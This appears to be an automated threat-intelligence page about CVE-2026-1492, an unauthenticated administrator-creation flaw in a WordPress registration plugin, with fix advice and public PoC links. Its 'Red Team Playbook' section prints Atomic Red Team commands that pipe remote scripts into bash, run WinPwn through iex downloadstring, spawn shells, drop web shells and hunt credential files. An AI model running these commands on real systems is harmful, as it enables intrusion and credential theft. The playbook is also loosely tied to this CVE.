CVE-2026-1492
Overview
This vulnerability is an improper privilege management flaw in the WordPress plugin wpeverest User Registration & Membership. The root cause is that the plugin accepts a user-supplied role parameter during membership registration without enforcing a server-side allowlist. This affects the membership registration component responsible for assigning user roles upon account creation.
Vulnerability Description
The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to improper privilege management in all versions up to, and including, 5.1.2. This is due to the plugin accepting a user-supplied role during membership registration without properly enforcing a server-side allowlist. This makes it possible for unauthenticated attackers to create administrator accounts by supplying a role value during membership registration.
Impact
An unauthenticated attacker can exploit this vulnerability to create accounts with administrator privileges by supplying a crafted role value during registration. No prior authentication or user interaction is required, and the attack can be performed remotely over the network. This enables full administrative control over the affected WordPress site, potentially leading to data compromise, site takeover, and persistent unauthorized access. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation without privileges or user interaction.
Solution
Users should update the wpeverest User Registration & Membership plugin to version 5.1.3 or later, where this privilege escalation flaw is patched. Detailed patch information and upgrade instructions are provided in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/7e9fec92-f471-4ce9-9138-1c58ad658da2 and the WordPress plugin Trac changeset 3469042. No additional workarounds are documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the User Registration & Membership plugin for WordPress is rooted in improper privilege management, specifically in the way it handles user roles during the membership registration process. The plugin fails to enforce a server-side allowlist for user roles, allowing attackers to specify arbitrary roles when creating new accounts. This lack of validation means that an unauthenticated user can manipulate the registration process to gain elevated privileges, such as creating an administrator account. This flaw exists in all versions up to and including 5.1.2, making it a widespread issue for sites utilizing this plugin.
Attack vectors for exploiting this vulnerability are straightforward and do not require advanced technical skills. An attacker can simply access the registration form provided by the plugin and submit a request with a crafted role value. By specifying "administrator" or any other privileged role, the attacker can create an account with elevated permissions. Once the account is established, the attacker can log in and gain full control over the WordPress site, potentially leading to further exploitation, data breaches, or defacement of the website. This scenario poses a significant risk, especially for sites that lack additional security measures or are not regularly monitored.
The real-world impact of this vulnerability can be profound, particularly for businesses that rely on their online presence for revenue and customer engagement. An attacker gaining administrative access can lead to unauthorized data access, manipulation of content, and even the installation of malicious software. The consequences can extend beyond immediate financial loss; they can also damage a company's reputation and erode customer trust. Organizations may face regulatory scrutiny and potential legal ramifications if sensitive data is compromised. The high CVSS score of 9.8 indicates that this vulnerability is critical, underscoring the urgency for affected users to address it promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, it is essential to update the plugin to the latest version, where the vulnerability has been addressed. Regularly monitoring and auditing user accounts can help identify any unauthorized accounts that may have been created before the patch was applied. Additionally, employing web application firewalls (WAF) can help filter and monitor incoming traffic, potentially blocking malicious registration attempts. Implementing strong access controls and employing security plugins that enforce role management can further reduce the risk of privilege escalation through improper user role assignment.
In conclusion, the improper privilege management vulnerability in the User Registration & Membership plugin for WordPress poses a significant threat to the security of websites utilizing this software. The ease of exploitation combined with the potential for severe consequences makes it imperative for organizations to take immediate action. By understanding the technical details, recognizing the attack vectors, assessing the business risks, and implementing effective detection and mitigation strategies, organizations can protect themselves from the adverse effects of this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-1492, with telemetry indicating a significant uptick in exploitation attempts targeting the User Registration & Membership plugin for WordPress. Concurrently, the Exploit Prediction Scoring System (EPSS) score for this vulnerability has risen notably, reflecting increased confidence in its exploitation likelihood. This upward trend signals that threat actors are intensifying efforts to leverage the improper privilege management flaw, likely motivated by the ease of creating unauthorized administrator accounts without authentication. For defenders, this development underscores an elevated risk environment where exploitation attempts may become more frequent and widespread, increasing the potential for severe compromise of affected WordPress sites. The rising EPSS score, now approaching the top percentile, suggests that the vulnerability is gaining traction within attacker communities, possibly fueled by the availability of multiple proof-of-concept exploits circulating publicly. Consequently, the threat level associated with CVE-2026-1492 should be reassessed as increasingly critical, warranting heightened vigilance in detection and response capabilities.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
limo57640-crypto/wp-user-registration-vuln-checker
Read-only WordPress User Registration CVE-2026-1492 checker for hidden admins, plugin version, uploads PHP, cron, and co...
|
limo57640-crypto | 0 | 0 | 2026-05-16 | View |
|
Nxploited/CVE-2026-1492
User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation via Membership Registration
|
Nxploited | 0 | 0 | 2026-04-18 | View |
|
imad-z1/CVE-2026-1492-POC
User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation via Membership Registration
|
imad-z1 | 0 | 0 | 2026-03-07 | View |
|
the8frust/CVE-2026-1492
Exploit for CVE-2026-1492 affecting the WordPress User Registration plugin, allowing unauthenticated attackers to regist...
|
the8frust | 0 | 0 | 2026-03-20 | View |
|
dreamboyim66-boop/CVE-2026-1492-POC
User Registration & Membership <= 5.1.2 - Unauthenticated Privilege Escalation via Membership Registration
|
dreamboyim66-boop | 0 | 0 | 2026-03-07 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-1492 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/7e9fec92-f471-4ce9-9138-1c58ad658da2?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3469042/user-registration |